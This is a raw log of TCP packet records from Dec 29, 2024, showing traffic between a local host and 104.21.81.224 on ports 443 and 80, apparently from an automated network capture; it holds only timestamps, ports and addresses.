Dec 29, 2024 16:03:43.399030924 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.399040937 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.399108887 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.399116993 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.399161100 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.405945063 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.405961990 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.406022072 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.406032085 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.406039000 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.406358004 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.413564920 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.413582087 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.413645029 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.413654089 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.413712978 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.420089006 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.420101881 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.420161963 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.420170069 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.420217991 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.572426081 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.572443008 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.572510004 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.572520018 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.572570086 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.578856945 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.578874111 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.578960896 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.578969002 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.579049110 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.586158037 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.586173058 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.586231947 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.586240053 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.586313009 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.593530893 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.593544960 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.593604088 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.593612909 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.593667030 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.599978924 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.599992037 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.600128889 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.600136995 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.600286007 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.607759953 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.607779026 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.607830048 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.607839108 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.607865095 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.608009100 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.614219904 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.614233971 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.614299059 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.614309072 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.614355087 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.621494055 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.621506929 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.621582031 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.621591091 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.621635914 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.773814917 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.773837090 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.773905039 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.773914099 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.773983002 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.780145884 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.780160904 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.780224085 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.780231953 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.780287981 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.787516117 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.787529945 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.787592888 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.787600040 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.787646055 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.794838905 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.794853926 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.794913054 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.794919968 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.794961929 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.801270008 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.801284075 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.801357031 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.801366091 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.801436901 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.809076071 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.809088945 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.809164047 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.809175968 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.809215069 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.815516949 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.815531015 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.815619946 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.815634012 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.815685987 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.822849035 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.822870016 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.822928905 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.822937012 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.823038101 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.975404024 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.975433111 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.975498915 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.975517035 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.975553036 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.975564957 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.981776953 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.981802940 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.981885910 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.981913090 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.981931925 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.981962919 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.989171982 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.989192963 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.989269972 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.989279985 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.989326954 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.996411085 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.996432066 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.996471882 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.996480942 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:43.996505022 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:43.996525049 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.002871037 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.002890110 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.002933025 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.002940893 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.002974987 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.003005981 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.010727882 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.010747910 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.010799885 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.010821104 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.010833979 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.010885954 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.017169952 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.017191887 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.017246008 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.017261028 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.017277956 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.017327070 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.024636984 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.024671078 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.024703979 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.024710894 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.024741888 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.024764061 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.176592112 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.176609039 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.176680088 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.176693916 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.176734924 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.183043003 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.183058023 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.183126926 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.183137894 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.183154106 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.183178902 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.190381050 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.190398932 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.190474033 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.190481901 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.190526962 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.197668076 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.197681904 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.197741985 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.197750092 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.197773933 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.197792053 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.205035925 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.205049038 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.205115080 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.205122948 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.205164909 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.206818104 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.206871986 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.206882954 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.206912041 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.207113028 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.207125902 CET	443	49713	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.207137108 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.207174063 CET	49713	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.265347958 CET	49736	80	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.386173010 CET	80	49736	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:44.386287928 CET	49736	80	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.386563063 CET	49736	80	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:44.507376909 CET	80	49736	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:45.496546030 CET	80	49736	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:45.497190952 CET	49736	80	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:45.498004913 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:45.498049021 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:45.501178980 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:45.507606983 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:45.507623911 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:46.768443108 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:46.768551111 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:46.792607069 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:46.792620897 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:46.803807974 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:46.803813934 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.231550932 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.231625080 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.231669903 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.231688976 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.231703997 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.231718063 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.231743097 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.231760979 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.231767893 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.231787920 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.231862068 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.231867075 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.231951952 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.239912987 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.239967108 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.240019083 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.240067959 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.248275042 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.248330116 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.248406887 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.248456955 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.256795883 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.256851912 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.433429956 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.433501959 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.433516979 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.433567047 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.437262058 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.438087940 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.445126057 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.445178986 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.445241928 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.445291042 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.452965021 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.453159094 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.453170061 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.453216076 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.460957050 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.461184025 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.461195946 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.461246014 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.468789101 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.468887091 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.476654053 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.476728916 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.476807117 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.476821899 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.476871967 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.484483957 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.484550953 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.492335081 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.492415905 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.492449999 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.492497921 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.500221014 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.500272989 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.500281096 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.500350952 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.508203030 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.508905888 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.508913040 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.508970022 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.634535074 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.637202024 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.637212038 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.637264013 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.638334990 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.638392925 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.644402027 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.645164967 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.645173073 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.645220995 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.651933908 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.653167009 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.653177023 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.653223038 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.659715891 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.661176920 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.661184072 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.661232948 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.667223930 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.667293072 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.682359934 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.682445049 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.689929962 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.689995050 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.697398901 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.701273918 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.712529898 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.712624073 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.720169067 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.720249891 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.735295057 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.735479116 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.750431061 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.750600100 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.838654995 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.838881016 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.849978924 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.850151062 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.861315966 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.861490011 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.866580009 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.866663933 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.877003908 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.877167940 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.882158995 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.882230043 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.891971111 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.892071009 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.901887894 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.901966095 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.911772013 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.911921024 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.916966915 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.917028904 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.926768064 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.926846981 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.931746006 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.931898117 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.941658020 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.941737890 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.951509953 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.951561928 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.961456060 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.961510897 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.966497898 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.966569901 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.976397991 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.976536989 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.986310959 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.986368895 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:47.996181011 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:47.996247053 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:48.038849115 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:48.038918018 CET	49737	443	192.168.2.5	104.21.81.224
Dec 29, 2024 16:03:48.042491913 CET	443	49737	104.21.81.224	192.168.2.5
Dec 29, 2024 16:03:48.042561054 CET	49737	443	192.168.2.5	104.21.81.224
